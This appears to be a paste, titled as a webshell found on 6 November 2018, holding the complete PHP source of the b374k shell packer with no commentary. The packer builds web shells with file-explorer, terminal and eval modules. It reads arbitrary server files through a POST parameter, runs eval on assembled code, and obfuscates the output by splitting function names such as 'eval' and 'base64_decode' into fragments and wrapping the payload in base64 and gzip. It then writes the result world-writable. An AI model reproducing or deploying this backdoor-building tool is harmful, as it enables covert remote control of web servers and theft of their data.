2018-11-06 webshell found

1. Webshell found 11/6/2018
2.  
3.  
4. <?php
5. /*
6. b374k shell
7. Jayalah Indonesiaku
8. (c)2014
9. https://github.com/b374k/b374k
10.  
11. */
12. $GLOBALS['packer']['title'] = "b374k shell packer";
13. $GLOBALS['packer']['version'] = "0.4.2";
14. $GLOBALS['packer']['base_dir'] = "./base/";
15. $GLOBALS['packer']['module_dir'] = "./module/";
16. $GLOBALS['packer']['theme_dir'] = "./theme/";
17. $GLOBALS['packer']['module'] = packer_get_module();
18. $GLOBALS['packer']['theme'] = packer_get_theme();
19.  
20. require $GLOBALS['packer']['base_dir'].'jsPacker.php';
21.  
22. /* PHP FILES START */
23. $base_code = "";
24. $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."resources.php");
25. $base_code .= packer_read_file($GLOBALS['packer']['base_dir']."main.php");
26. $module_code = packer_read_file($GLOBALS['packer']['base_dir']."base.php");
27. /* PHP FILES END */
28.  
29. /* JAVASCRIPT AND CSS FILES START */
30. $zepto_code = packer_read_file($GLOBALS['packer']['base_dir']."zepto.js");
31. $js_main_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."main.js");
32.  
33. $js_code = "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."sortable.js").$js_main_code;
34. $js_code .= "\n\n".packer_read_file($GLOBALS['packer']['base_dir']."base.js");
35.  
36.  
37. if(isset($_COOKIE['packer_theme'])) $theme = $_COOKIE['packer_theme'];
38. else $theme ="default";
39. $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
40.  
41. /* JAVASCRIPT AND CSS FILES END */
42.  
43. // layout
44. $layout = packer_read_file($GLOBALS['packer']['base_dir']."layout.php");
45. $p = array_map("rawurldecode", packer_get_post());
46.  
47. if(isset($_SERVER['REMOTE_ADDR'])){
48. if(isset($p['read_file'])){
49. $file = $p['read_file'];
50. if(is_file($file)){
51. packer_output(packer_html_safe(packer_read_file($file)));
52. }
53. packer_output('error');
54. }
55. elseif(isset($_GET['run'])){
56. if(empty($_GET['run'])) $modules = array();
57. else $modules = explode("," ,$_GET['run']);
58. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
59.  
60. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
61. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
62.  
63. foreach($modules as $module){
64. $module = trim($module);
65. $filename = $GLOBALS['packer']['module_dir'].$module;
66. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
67. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
68.  
69. }
70.  
71. $layout = str_replace("<__CSS__>", $css_code, $layout);
72. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
73. $layout = str_replace("<__JS__>", $js_code, $layout);
74.  
75. $content = trim($module_init)."?>".$base_code.$module_code.$layout;
76. eval($content);
77. die();
78. }
79. elseif(isset($p['outputfile'])&&isset($p['password'])&&isset($p['module'])&&isset($p['strip'])&&isset($p['base64'])&&isset($p['compress'])&&isset($p['compress_level'])){
80. $outputfile = trim($p['outputfile']);
81. if(empty($outputfile)) $outputfile = 'b374k.php';
82. $password = trim($p['password']);
83. $modules = trim($p['module']);
84. if(empty($modules)) $modules = array();
85. else $modules = explode("," ,$modules);
86.  
87. $strip = trim($p['strip']);
88. $base64 = trim($p['base64']);
89. $compress = trim($p['compress']);
90. $compress_level = (int) $p['compress_level'];
91.  
92. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
93.  
94. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
95. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
96.  
97. foreach($modules as $module){
98. $module = trim($module);
99. $filename = $GLOBALS['packer']['module_dir'].$module;
100. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
101. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
102.  
103. }
104.  
105. $layout = str_replace("<__CSS__>", $css_code, $layout);
106. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
107.  
108. if($strip=='yes') $js_code = packer_pack_js($js_code);
109. $layout = str_replace("<__JS__>", $js_code, $layout);
110.  
111.  
112. $htmlcode = trim($layout);
113. $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
114.  
115. packer_output(packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password));
116. }
117. else{
118.  
119. $available_themes = "<tr><td>Theme</td><td><select class='theme' style='width:150px;'>";
120. foreach($GLOBALS['packer']['theme'] as $k){
121. if($k==$theme) $available_themes .= "<option selected='selected'>".$k."</option>";
122. else $available_themes .= "<option>".$k."</option>";
123. }
124. $available_themes .= "</select></td></tr>";
125.  
126. ?><!doctype html>
127. <html>
128. <head>
129. <title><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></title>
130. <meta charset='utf-8'>
131. <meta name='robots' content='noindex, nofollow, noarchive'>
132. <style type="text/css">
133. <?php echo $css_code;?>
134. #devTitle{
135. font-size:18px;
136. text-align:center;
137. font-weight:bold;
138. }
139. </style>
140. </head>
141. <body>
142.  
143. <div id='wrapper' style='padding:12px'>
144. <div id='devTitle' class='border'><?php echo $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version'];?></div>
145. <br>
146. <table class='boxtbl'>
147. <tr><th colspan='2'><p class='boxtitle'>Quick Run</p></th></tr>
148. <tr><td style='width:220px;'>Module (separated by comma)</td><td><input type='text' id='module' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
149. <?php echo $available_themes; ?>
150. <tr><td colspan='2'>
151. <form method='get' id='runForm' target='_blank'><input type='hidden' id='module_to_run' name='run' value=''>
152. <span class='button' id='runGo'>Run</span>
153. </form>
154. </td></tr>
155. </table>
156. <br>
157. <table class='boxtbl'>
158. <tr><th colspan='2'><p class='boxtitle'>Pack</p></th></tr>
159. <tr><td style='width:220px;'>Output</td><td><input id='outputfile' type='text' value='b374k.php'></td></tr>
160. <tr><td>Password</td><td><input id='password' type='text' value='b374k'></td></tr>
161. <tr><td>Module (separated by comma)</td><td><input type='text' id='module_to_pack' value='<?php echo implode(",", $GLOBALS['packer']['module']);?>'></td></tr>
162. <?php echo $available_themes; ?>
163. <tr><td>Strip Comments and Whitespaces</td><td>
164. <select id='strip' style='width:150px;'>
165. <option selected="selected">yes</option>
166. <option>no</option>
167. </select>
168. </td></tr>
169.  
170. <tr><td>Base64 Encode</td><td>
171. <select id='base64' style='width:150px;'>
172. <option selected="selected">yes</option>
173. <option>no</option>
174. </select>
175. </td></tr>
176.  
177. <tr id='compress_row'><td>Compress</td><td>
178. <select id='compress' style='width:150px;'>
179. <option>no</option>
180. <option selected="selected">gzdeflate</option>
181. <option>gzencode</option>
182. <option>gzcompress</option>
183. </select>
184. <select id='compress_level' style='width:150px;'>
185. <option>1</option>
186. <option>2</option>
187. <option>3</option>
188. <option>4</option>
189. <option>5</option>
190. <option>6</option>
191. <option>7</option>
192. <option>8</option>
193. <option selected="selected">9</option>
194. </select>
195. </td></tr>
196.  
197. <tr><td colspan='2'>
198. <span class='button' id='packGo'>Pack</span>
199. </td></tr>
200. <tr><td colspan='2' id='result'></td></tr>
201. <tr><td colspan='2'><textarea id='resultContent'></textarea></td></tr>
202. </table>
203. </div>
204.  
205. <script type='text/javascript'>
206. var init_shell = false;
207. <?php echo $zepto_code;?>
208. <?php echo $js_main_code;?>
209.  
210. var targeturl = '<?php echo packer_get_self(); ?>';
211. var debug = false;
212.  
213. Zepto(function($){
214. refresh_row();
215.  
216. $('#runGo').on('click', function(e){
217. module = $('#module').val();
218. $('#module_to_run').val(module);
219. $('#runForm').submit();
220. });
221.  
222. $('#base64').on('change', function(e){
223. refresh_row();
224. });
225.  
226. $('#packGo').on('click', function(e){
227. outputfile = $('#outputfile').val();
228. password = $('#password').val();
229. module = $('#module_to_pack').val();
230. strip = $('#strip').val();
231. base64 = $('#base64').val();
232. compress = $('#compress').val();
233. compress_level = $('#compress_level').val();
234.  
235. send_post({outputfile:outputfile, password:password, module:module, strip:strip, base64:base64, compress:compress, compress_level:compress_level}, function(res){
236. splits = res.split('{[|b374k|]}');
237. $('#resultContent').html(splits[1]);
238. $('#result').html(splits[0]);
239. });
240.  
241. });
242.  
243. $('.theme').on('change', function(e){
244. $('.theme').val($(this).val());
245. set_cookie('packer_theme', $('.theme').val());
246. location.href = targeturl;
247. });
248. });
249.  
250. function refresh_row(){
251. base64 = $('#base64').val();
252. if(base64=='yes'){
253. $('#compress_row').show();
254. }
255. else{
256. $('#compress_row').hide();
257. $('#compress').val('no');
258. }
259. }
260.  
261. </script>
262. </body>
263. </html><?php
264. }
265. }
266. else{
267. $output = $GLOBALS['packer']['title']." ".$GLOBALS['packer']['version']."\n\n";
268.  
269. if(count($argv)<=1){
270. $output .= "options :\n";
271. $output .= "\t-o filename\t\t\t\tsave as filename\n";
272. $output .= "\t-p password\t\t\t\tprotect with password\n";
273. $output .= "\t-t theme\t\t\t\ttheme to use\n";
274. $output .= "\t-m modules\t\t\t\tmodules to pack separated by comma\n";
275. $output .= "\t-s\t\t\t\t\tstrip comments and whitespaces\n";
276. $output .= "\t-b\t\t\t\t\tencode with base64\n";
277. $output .= "\t-z [no|gzdeflate|gzencode|gzcompress]\tcompression (use only with -b)\n";
278. $output .= "\t-c [0-9]\t\t\t\tlevel of compression\n";
279. $output .= "\t-l\t\t\t\t\tlist available modules\n";
280. $output .= "\t-k\t\t\t\t\tlist available themes\n";
281.  
282. }
283. else{
284. $opt = getopt("o:p:t:m:sbz:c:lk");
285.  
286. if(isset($opt['l'])){
287. $output .= "available modules : ".implode(",", $GLOBALS['packer']['module'])."\n\n";
288. echo $output;
289. die();
290. }
291.  
292. if(isset($opt['k'])){
293. $output .= "available themes : ".implode(",", $GLOBALS['packer']['theme'])."\n\n";
294. echo $output;
295. die();
296. }
297.  
298. if(isset($opt['o'])&&(trim($opt['o'])!='')){
299. $outputfile = trim($opt['o']);
300. }
301. else{
302. $output .= "error : no filename given (use -o filename)\n\n";
303. echo $output;
304. die();
305. }
306.  
307. $password = isset($opt['p'])? trim($opt['p']):"";
308. $theme = isset($opt['t'])? trim($opt['t']):"default";
309. if(!in_array($theme, $GLOBALS['packer']['theme'])){
310. $output .= "error : unknown theme file\n\n";
311. echo $output;
312. die();
313. }
314. $css_code = packer_read_file($GLOBALS['packer']['theme_dir'].$theme.".css");
315.  
316. $modules = isset($opt['m'])? trim($opt['m']):implode(",", $GLOBALS['packer']['module']);
317. if(empty($modules)) $modules = array();
318. else $modules = explode("," ,$modules);
319.  
320. $strip = isset($opt['s'])? "yes":"no";
321. $base64 = isset($opt['b'])? "yes":"no";
322.  
323. $compress = isset($opt['z'])? trim($opt['z']):"no";
324. if(($compress!='gzdeflate')&&($compress!='gzencode')&&($compress!='gzcompress')&&($compress!='no')){
325. $output .= "error : unknown options -z ".$compress."\n\n";
326. echo $output;
327. die();
328. }
329. else{
330. if(($base64=='no')&&($compress!='no')){
331. $output .= "error : use -z options only with -b\n\n";
332. echo $output;
333. die();
334. }
335. }
336.  
337. $compress_level = isset($opt['c'])? trim($opt['c']):"";
338. if(empty($compress_level)) $compress_level = '9';
339. if(!preg_match("/^[0-9]{1}$/", $compress_level)){
340. $output .= "error : unknown options -c ".$compress_level." (use only 0-9)\n\n";
341. echo $output;
342. die();
343. }
344. $compress_level = (int) $compress_level;
345.  
346. $output .= "Filename\t\t: ".$outputfile."\n";
347. $output .= "Password\t\t: ".$password."\n";
348. $output .= "Theme\t\t\t: ".$theme."\n";
349. $output .= "Modules\t\t\t: ".implode(",",$modules)."\n";
350. $output .= "Strip\t\t\t: ".$strip."\n";
351. $output .= "Base64\t\t\t: ".$base64."\n";
352. if($base64=='yes') $output .= "Compression\t\t: ".$compress."\n";
353. if($base64=='yes') $output .= "Compression level\t: ".$compress_level."\n";
354.  
355. $module_arr = array_merge(array("explorer", "terminal", "eval"), $modules);
356. $module_arr = array_map("packer_wrap_with_quote", $module_arr);
357. $module_init = "\n\$GLOBALS['module_to_load'] = array(".implode(", ", $module_arr).");";
358.  
359. foreach($modules as $module){
360. $module = trim($module);
361. $filename = $GLOBALS['packer']['module_dir'].$module;
362. if(is_file($filename.".php")) $module_code .= packer_read_file($filename.".php");
363. if(is_file($filename.".js")) $js_code .= "\n".packer_read_file($filename.".js")."\n";
364. }
365.  
366. $layout = str_replace("<__CSS__>", $css_code, $layout);
367. $layout = str_replace("<__ZEPTO__>", $zepto_code, $layout);
368.  
369. if($strip=='yes') $js_code = packer_pack_js($js_code);
370. $layout = str_replace("<__JS__>", $js_code, $layout);
371.  
372. $htmlcode = trim($layout);
373. $phpcode = "<?php ".trim($module_init)."?>".trim($base_code).trim($module_code);
374.  
375. $res = packer_b374k($outputfile, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password);
376. $status = explode("{[|b374k|]}", $res);
377. $output .= "Result\t\t\t: ".strip_tags($status[0])."\n\n";
378. }
379. echo $output;
380. }
381.  
382. function packer_read_file($file){
383. $content = false;
384. if($fh = @fopen($file, "rb")){
385. $content = "";
386. while(!feof($fh)){
387. $content .= fread($fh, 8192);
388. }
389. }
390. return $content;
391. }
392.  
393. function packer_write_file($file, $content){
394. if($fh = @fopen($file, "wb")){
395. if(fwrite($fh, $content)!==false){
396. if(!class_exists("ZipArchive")) return true;
397.  
398. if(file_exists($file.".zip")) unlink ($file.".zip");
399. $zip = new ZipArchive();
400. $filename = "./".$file.".zip";
401.  
402. if($zip->open($filename, ZipArchive::CREATE)!==TRUE) return false;
403. $zip->addFile($file);
404. $zip->close();
405. return true;
406. }
407. }
408. return false;
409. }
410.  
411. function packer_get_post(){
412. return packer_fix_magic_quote($_POST);
413. }
414.  
415. function packer_fix_magic_quote($arr){
416. $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
417. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
418. if(is_array($arr)){
419. foreach($arr as $k=>$v){
420. if(is_array($v)) $arr[$k] = clean($v);
421. else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
422. }
423. }
424. }
425. return $arr;
426. }
427.  
428. function packer_html_safe($str){
429. return htmlspecialchars($str, 2 | 1);
430. }
431.  
432. function packer_wrap_with_quote($str){
433. return "\"".$str."\"";
434. }
435.  
436. function packer_output($str){
437. header("Content-Type: text/plain");
438. header("Cache-Control: no-cache");
439. header("Pragma: no-cache");
440. echo $str;
441. die();
442. }
443.  
444. function packer_get_self(){
445. $query = (isset($_SERVER["QUERY_STRING"])&&(!empty($_SERVER["QUERY_STRING"])))?"?".$_SERVER["QUERY_STRING"]:"";
446. return packer_html_safe($_SERVER["REQUEST_URI"].$query);
447. }
448.  
449. function packer_strips($str){
450. $newStr = '';
451.  
452. $commentTokens = array(T_COMMENT);
453.  
454. if(defined('T_DOC_COMMENT')) $commentTokens[] = T_DOC_COMMENT;
455. if(defined('T_ML_COMMENT')) $commentTokens[] = T_ML_COMMENT;
456.  
457. $tokens = token_get_all($str);
458.  
459. foreach($tokens as $token){
460. if (is_array($token)) {
461. if (in_array($token[0], $commentTokens)) continue;
462. $token = $token[1];
463. }
464. $newStr .= $token;
465. }
466. $newStr = preg_replace("/(\s{2,})/", " ", $newStr);
467. return $newStr;
468. }
469.  
470. function packer_get_theme(){
471. $available_themes = array();
472. foreach(glob($GLOBALS['packer']['theme_dir']."*.css") as $filename){
473. $filename = basename($filename, ".css");
474. $available_themes[] = $filename;
475. }
476. return $available_themes;
477. }
478.  
479. function packer_get_module(){
480. $available_modules = array();
481. foreach(glob($GLOBALS['packer']['module_dir']."*.php") as $filename){
482. $filename = basename($filename, ".php");
483. if(packer_check_module($filename)) $available_modules[] = $filename;
484. }
485. return $available_modules;
486. }
487.  
488. function packer_check_module($module){
489. $filename = $GLOBALS['packer']['module_dir'].$module;
490. if(is_file($filename.".php")){
491. $content = packer_read_file($filename.".php");
492. @eval("?>".$content);
493. if($GLOBALS['module'][$module]['id']==$module) return true;
494. }
495. return false;
496. }
497.  
498. function packer_pack_js($str){
499. $packer = new JavaScriptPacker($str, 0, true, false);
500. return $packer->pack();
501. }
502.  
503. function packer_b374k($output, $phpcode, $htmlcode, $strip, $base64, $compress, $compress_level, $password){
504. $content = "";
505. if(is_file($output)){
506. if(!is_writable($output)) return "error : file ".$output." exists and is not writable{[|b374k|]}";
507. }
508.  
509. if(!empty($password)) $password = "\$GLOBALS['pass'] = \"".sha1(md5($password))."\"; // sha1(md5(pass))\n";
510.  
511. $compress_level = (int) $compress_level;
512. if($compress_level<0) $compress_level = 0;
513. elseif($compress_level>9) $compress_level = 9;
514.  
515. $version = "";
516. if(preg_match("/\\\$GLOBALS\['ver'\]\ *=\ *[\"']+([^\"']+)[\"']+/", $phpcode, $r)){
517. $version = $r[1];
518. }
519.  
520. $header = "<?php
521. /*
522. b374k shell ".$version."
523. Jayalah Indonesiaku
524. (c)".@date("Y",time())."
525. https://github.com/b374k/b374k
526.  
527. */\n";
528.  
529.  
530. if($strip=='yes'){
531. $phpcode = packer_strips($phpcode);
532. $htmlcode = preg_replace("/(\ {2,}|\n{2,}|\t+)/", "", $htmlcode);
533. $htmlcode = preg_replace("/\r/", "", $htmlcode);
534. $htmlcode = preg_replace("/}\n+/", "}", $htmlcode);
535. $htmlcode = preg_replace("/\n+}/", "}", $htmlcode);
536. $htmlcode = preg_replace("/\n+{/", "{", $htmlcode);
537. $htmlcode = preg_replace("/\n+/", "\n", $htmlcode);
538. }
539.  
540.  
541. $content = $phpcode.$htmlcode;
542.  
543. if($compress=='gzdeflate'){
544. $content = gzdeflate($content, $compress_level);
545. $encoder_func = "gz'.'in'.'fla'.'te";
546. }
547. elseif($compress=='gzencode'){
548. $content = gzencode($content, $compress_level);
549. $encoder_func = "gz'.'de'.'co'.'de";
550. }
551. elseif($compress=='gzcompress'){
552. $content = gzcompress($content, $compress_level);
553. $encoder_func = "gz'.'un'.'com'.'pre'.'ss";
554. }
555. else{
556. $encoder_func = "";
557. }
558.  
559. if($base64=='yes'){
560. $content = base64_encode($content);
561. if($compress!='no'){
562. $encoder = $encoder_func."(ba'.'se'.'64'.'_de'.'co'.'de(\$x))";
563. }
564. else{
565. $encoder = "ba'.'se'.'64'.'_de'.'co'.'de(\"\$x\")";
566. }
567.  
568. $code = $header.$password."\$func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on\";\$b374k=\$func('\$x','ev'.'al'.'(\"?>\".".$encoder.");');\$b374k(\"".$content."\");?>";
569. }
570. else{
571. if($compress!='no'){
572. $encoder = $encoder_func."(\$x)";
573. }
574. else{
575. $code = $header.$password."?>".$content;
576. $code = preg_replace("/\?>\s*<\?php\s*/", "", $code);
577. }
578. }
579.  
580. if(is_file($output)) unlink($output);
581. if(packer_write_file($output, $code)){
582. chmod($output, 0777);
583. return "Succeeded : <a href='".$output."' target='_blank'>[ ".$output." ] Filesize : ".filesize($output)."</a>{[|b374k|]}".packer_html_safe(trim($code));
584. }
585. return "error{[|b374k|]}";
586. }
587.  
588. ?>